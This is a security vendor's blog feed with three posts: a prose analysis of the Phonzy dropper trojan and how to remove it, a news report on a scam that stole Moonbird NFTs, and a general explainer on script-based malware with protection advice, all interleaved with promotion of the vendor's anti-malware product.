Script-based Archives – Gridinsoft Blog https://gridinsoft.com/blogs/tag/script-based/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Thu, 14 Mar 2024 16:03:49 +0000 en-US hourly 1 https://wordpress.org/?v=98328 200474804 Trojan:Script/Phonzy.B!ml https://gridinsoft.com/blogs/trojanscript-phonzy-removal-guide/ https://gridinsoft.com/blogs/trojanscript-phonzy-removal-guide/#respond Tue, 27 Feb 2024 08:45:57 +0000 https://gridinsoft.com/blogs/?p=19960 Trojan:Script/Phonzy.B!ml is a generic detection name used by Microsoft Defender. This type of malware is categorized as a loader as it mainly aims at delivering malicious payloads onto infected systems. Throughout hundreds of infection cases, Phonzy trojan was noticed to often deliver banking trojans. Trojan:Script/Phonzy.B!ml Overview Trojan:Script/Phonzy.B!ml is a generic detection name that Windows Defender… Continue reading Trojan:Script/Phonzy.B!ml

The post Trojan:Script/Phonzy.B!ml appeared first on Gridinsoft Blog.

]]>
Trojan:Script/Phonzy.B!ml is a generic detection name used by Microsoft Defender. This type of malware is categorized as a loader as it mainly aims at delivering malicious payloads onto infected systems. Throughout hundreds of infection cases, Phonzy trojan was noticed to often deliver banking trojans.

Trojan:Script/Phonzy.B!ml Overview

Trojan:Script/Phonzy.B!ml is a generic detection name that Windows Defender uses to mark small malware families. Such malicious programs may have similar behavior and code elements but belong to different groups.

Phonzy B!ml detection Defender

For functionality, Phonzy.B!ml is a scripted dropper malware. Its main purpose is to download and launch the additional malware in a manner that does not require user interaction. However, Phonzy samples are able to collect some basic information regarding the system, like location, OS version, and things the like. A typical payload delivered in Phonzy malware attacks is banking trojans – a specific type of stealers, which aims precisely at online banking information.

Is Phonzy B!ml False Positive?

The deeper look at the naming convention Microsoft uses in its detection names shows that the “!ml” particle stands for “machine learning”, meaning their AI detection engine has detected the file. Despite being highly effective and promising, it requires the confirmation of a signature detection system. Without this confirmation, it is particularly easy to get a lot of false positive detections.

Unfortunately, there is barely a way to distinguish between real and false detections. Modern malware does its best in hiding among legitimate programs and files, so file locations are not informative. That is the reason why I recommend scanning your system with GridinSoft Anti-Malware.

Phonzy.B!ml Technical Analysis

Since Phonzy is a generic detection name, it is rather hard to find a well-known sample to analyze. For that reason, I’ve done a comprehensive analysis of several ones – to have a better understanding of what this malware is capable of. In short – a rather simple dropper that can make a huge mess in the system it infects.

Launch & Unpacking

The majority of Phonzy samples that I’ve encountered arrive in a packed form – encrypted and/or archived. This is usually done for 2 reasons – to avoid the static detection and complicate the analysis. In the case of Phonzy, I’m leaning toward the first option.

Unpacking process
Process of malware unpacking

To perform the unpacking, Phonzy relies on the script that downloads it to the system. Usually, this is a PowerShell script that pulls the dropper from the intermediary server, and it is also responsible for launching one. A part of it is responsible for unpacking and launching the sample after downloading.

Gathering system information

Once launched, Trojan:Script/Phonzy.B!ml collects basic information about the target system. This may include the operating system version, hardware information, a list of installed programs and devices, and the device’s geolocation. Such information is mostly needed to fingerprint the system, i.e. give it a specific name corresponding to its internals. In addition to system info, some of the Phonzy.B!ml samples were able to take screenshots of the infected device’s screen.

System info log Phonzy
System info collected by one of Phonzy samples

Contacting Command & Control Server

The next step in the attack is contacting the command server. Malware sends an HTTP POST request to the C2, to notify about a new infection and send the collected data. Depending on the server response, malware may switch to idle or start downloading other malware. Overall, the C2 communications for Phonzy is simple and insignificant.

Delivering other malware

The key action of Phonzy Trojan is, obviously, deploying other malware samples to the infected system. It receives the instructions from the C2 in a form of IP address it should pull the payload from, and the way this payload should be launched. Usually, the said IP address corresponds to a compromised website that hackers use as an intermediary server.

For the ways to run the payload, the options are quite typical for droppers. All of the Phonzy samples I’ve analyzed were able to work with DLLs and executable files. The former can be launched through DLL hijacking and a hookup to the system DLL, while the latter is about the regular .exe run.

Self-Propagation to USB Drives

Some of the inspected variants are Phonzy.B!ml were capable of self-propagating via attached flash drives or other removable storage media. This is a rather unusual trick for modern malware, as security vendors elaborated the ways to detect virus-like spreading long ago. Nonetheless, you cannot deny effectiveness – a single infected USB drive is capable of infecting dozens of other systems without even a single click from malware masters.

How To Remove Trojan:Script/Phonzy.B!ml

To remove Phonzy B!ml, I’d recommend using GridinSoft Anti-Malware. The fact that dropper malware can spread a lot of other malware requires using advanced software to remove it all. GridinSoft Anti-Malware will check every little bit of the system and eliminate even the stealthiest malware. Launch a Full scan, wait for it to finish and remove the detections – that will clean up your system.

Trojan:Script/Phonzy.B!ml

Safety Recommendations

To avoid infection of your system, it is sufficient to follow basic cyber hygiene. The first rule is to avoid pirated software and sites that distribute it. Cracked software is an ideal shell for malware delivery, so it is not just about being careful – it is about staying away.

Having an advanced protection tool, like Gridinsoft Anti-Malware, is another key to make your system secure. Proactive protection coupled with an AI detection engine will weed out all the attempts of malicious software to get in. Also, its Removable Device Protection feature will block the Phonzy trojan attempting to infect the system via an USB drive.

The post Trojan:Script/Phonzy.B!ml appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojanscript-phonzy-removal-guide/feed/ 0 19960
29 Moonbirds Stolen via Link Click from a Proof Collective Member https://gridinsoft.com/blogs/moonbirds-stolen/ https://gridinsoft.com/blogs/moonbirds-stolen/#respond Wed, 01 Jun 2022 16:18:05 +0000 https://gridinsoft.com/blogs/?p=8232 29 Moonbirds, NFTs amounting to around 750 ETC (approximately $1,5M) in value, were stolen from an unmentioned Proof Collective member as a result of a scam, according to the May 25 tweet by @CirrusNFT. The theft happened as the victim clicked an unchecked link signing a transaction offered by a scammer who pretended to be… Continue reading 29 Moonbirds Stolen via Link Click from a Proof Collective Member

The post 29 Moonbirds Stolen via Link Click from a Proof Collective Member appeared first on Gridinsoft Blog.

]]>
29 Moonbirds, NFTs amounting to around 750 ETC (approximately $1,5M) in value, were stolen from an unmentioned Proof Collective member as a result of a scam, according to the May 25 tweet by @CirrusNFT. The theft happened as the victim clicked an unchecked link signing a transaction offered by a scammer who pretended to be a law-abiding buyer.

CirrusNFT tweet
The source of the news – a tweet by @CirrusNFT.

Another Proof Collective member, nicknamed Dollar (@knownasdollar on Twitter,) hinted that the scammer had been identified as @DVincent_ through doxxing via an exchange. According to the tweet, the total value of the items stolen by him (her?) reached around $2M.

Dollar and other Proof Collective members have already filed a report to the FBI; however, in his tweet, Dollar gave the crook a chance to avoid jail by delivering the stolen NFTs back.

Tweet by Dollar
The tweet by @knownasdollar exposing the Twitter account of the alleged criminal.

In the commentaries to Dollar’s message, other users confirmed that the alleged scammer has also tried to lure them into selling NFTs while insisting that the deal had to be stricken on a questionable peer-to-peer exchange.

The Twitter page of @DVincent_ is already inaccessible. Well, of course!

Proof Collective is a mysterious private club of non-fungible tokens collectors founded by Kevin Rose. To become a member, one must own a Proof Collective NFT. The membership fee is high enough to scare off random passers-by: 88 ETC which is more than $200 000, at least it was so in May 2022. Proof Collective is most famous for Moonbirds, a highly-hyped NFT campaign (selling 10 000 owl avatars for 2.5ETC each) launched on April 16, 2022.

The post 29 Moonbirds Stolen via Link Click from a Proof Collective Member appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/moonbirds-stolen/feed/ 0 8232
Script-based malware. How to stay protected? https://gridinsoft.com/blogs/script-based-malware/ https://gridinsoft.com/blogs/script-based-malware/#respond Wed, 29 Dec 2021 07:23:27 +0000 https://gridinsoft.com/blogs/?p=6804 Over the last four years, the share of script-based attacks of malware offenses worldwide has grown so drastically that it raised alerts among security specialists and ordinary users. In this post, we shall regard script-based malware, assess its strengths and weaknesses, explain how the attacks happen, and suggest measures to maintain security in your workgroup.… Continue reading Script-based malware. How to stay protected?

The post Script-based malware. How to stay protected? appeared first on Gridinsoft Blog.

]]>
Over the last four years, the share of script-based attacks of malware offenses worldwide has grown so drastically that it raised alerts among security specialists and ordinary users. In this post, we shall regard script-based malware, assess its strengths and weaknesses, explain how the attacks happen, and suggest measures to maintain security in your workgroup.

Security News: Greta Thunberg became the most popular character in phishing campaigns.

What is script-based malware?

To understand how someone can run a script-based attack on a computer, we must know what scripts are. They are sets of commands for a system to execute. Users employ them to automatize processes that they would otherwise perform manually. Programmers and advanced users create scripts in scripting languages. Those can be, roughly speaking, general-purpose (such as JavaScript, Python, and PHP), OS-oriented (like PowerShell and AppleScript), and there are also special script languages for particular applications and environments.

PowerShell Window
PowerShell is a handy Windows automation tool and a suitable environment for script-based attacks.

The scripts are neither malicious files nor the main content of files they inhabit. Instead, they are the documents’ allowable components, legal and, in theory, beneficial to the user. Scripts are not compiled. That means they are interpreted and executed by the software environment ad hoc without previous translation into machine code. For AppleScript, for example, such an environment is an Apple operating system. And for cross-system JavaScript (if it is about website construction), any modern web browser can serve as an interpreting environment.

The script-based hacker attacks are obviously the cyber-crimes that use scripts as a primary tool.

Related: “Malware” vs. “virus”.

What is so worrying about the script-based attacks?

First of all, scripts are not files, as we already mentioned. Antivirus programs have a hard time detecting them, or better to say: they are useless against scripts. It is so because modern security software focuses on detecting and removing malicious files. Thus, in the case of script-based attacks, we are dealing with ghostly malware, invisible to antivirus programs.

Another important thing is that scripts are generally hard to detect. They exist in primary memory, soon to be overwritten or erased. It is actually possible to find the origin of a script if criminals inaccurately leave traces, but why would they do that.

How can an attacker execute malware through a script?

Let’s make it clear: we are not talking about malicious scripts tied to websites (Cross-Site Scripting), which are more or less studied and covered by browser and antivirus security systems. Files fitted with simple yet treacherous scripts constitute a new problem. These are the files whose formats antivirus software lets through by default, not regarding as dangerous: PDF, Word, e-books, HTML applications, and others.

Simple JavaScript code usually employed in files like these can add various practical functions, like making PDF documents signable or featuring a fillable questionnaire. But the script can have a malicious purpose as well. In case of a script-based attack, it most likely will be a set of commands to download any other malware that harms for real. Ransomware, for instance, is the most lucrative type of attack for hackers. The crooks only expect a user to open a file to run the script or, in some cases, to allow macros therefor.

Disabled Macros in Word
RED FLAG: a downloaded document asks you to enable macros in MS Office.

Script-stuffed files can also be downloaded items you are trusty about since they update programs you already have. At least, you believe so. These can be plug-ins, add-ons, and so on. Yes, the UAC will ask whether you really want to download this file, but this always happens, and we tend to ignore such warnings. If the criminals manage to cheat you – consider they also cheated your security software. By the way, various untrustworthy PDF-readers and their plug-ins are one of the most dangerous programs in terms of script-based attack menace.

The script-based attacks mostly endanger Windows systems exploiting vulnerabilities of Command Prompt and PowerShell, the in-built automation tools. However, neither Android, iOS, nor even Linux is safe.

How to protect yourself and your workgroup?

The weakness of script-based malware is that it has to be run by the user. Therefore, the best protection is to be cautious and avoid unknown downloads. Remember that PDF, Word, and other data files can contain a malicious script. These bogus files are most likely to arrive via e-mail or messengers in letters sent seemingly by someone you trust – usually services-providing organizations. Be especially wary of reports from delivery companies like FedEx. Since a postal delivery is pretty believable to be unexpected, hackers often use this disguise for their phishing mail. Before downloading any attachments from suspicious senders, triple-check the source and the message itself. If you are attentive enough, you will find a mistake in the address line, your name, or the text itself.

Email with a PDF attachment
Watch out for dubious e-mails with enclosed PDF files, Word documents, HTML application, etc.

In workgroups, it makes sense to separate those computers that need to run scripts from those that can do without them. The former should maintain extreme vigilance and advisably deploy zero-trust policy antivirus software, which is for the moment presented by Windows 11 Defender. It has many issues, but it seriously jeopardizes the plans of malefactors who go in for script-based attacks.

Script-fitted files can spread rapidly via the injured network using the same vulnerabilities of Windows elements they use to deliver their malicious payload. General security measures, such as file backup and network separation, are also a must to minimize the destructive effect of any successful cyber-attack.

Consider reading: Slow PC. Possible causes and how to fix them.

The post Script-based malware. How to stay protected? appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/script-based-malware/feed/ 0 6804